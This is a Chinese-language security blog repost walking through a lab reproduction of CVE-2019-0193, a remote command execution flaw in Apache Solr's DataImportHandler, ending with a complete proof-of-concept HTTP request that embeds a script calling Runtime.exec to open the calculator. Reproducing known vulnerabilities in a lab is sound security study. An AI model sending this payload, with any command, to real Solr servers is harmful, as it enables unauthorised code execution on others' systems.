CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

admin 2022年10月30日22:09:39评论121 views字数 944阅读3分8秒阅读模式

漏洞环境

链接:https://pan.baidu.com/s/1kHkacMz-_K4wLw1esHiOQQ

提取码:gddk

漏洞危害

执行系统命令

影响范围

Apache Solr < 8.2.0

漏洞复现

下载漏洞环境,解压,进入到solr-7.7.2目录下,在当前目录下执行命令

.binsolr.cmd -e dih

CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

然后打开浏览器访问127.0.0.1:8983

点开Core Admin获取所有的core信息然后随意选择一个,这里我选择的是mail

CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

抓取当前页面的请求包,替换完整POC,这里需要注意的是红框里的core是你选择的core要保持一致

CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

弹出目标系统的计算器

CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

复现成功

完整的POC:

POST /solr/mail/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=mail&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>

原文始发于微信公众号(赛瑞攻防实验室):CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月30日22:09:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2019-0193:Apache Solr 远程命令执行漏洞复现http://cn-sec.com/archives/886835.html

发表评论

匿名网友 填写信息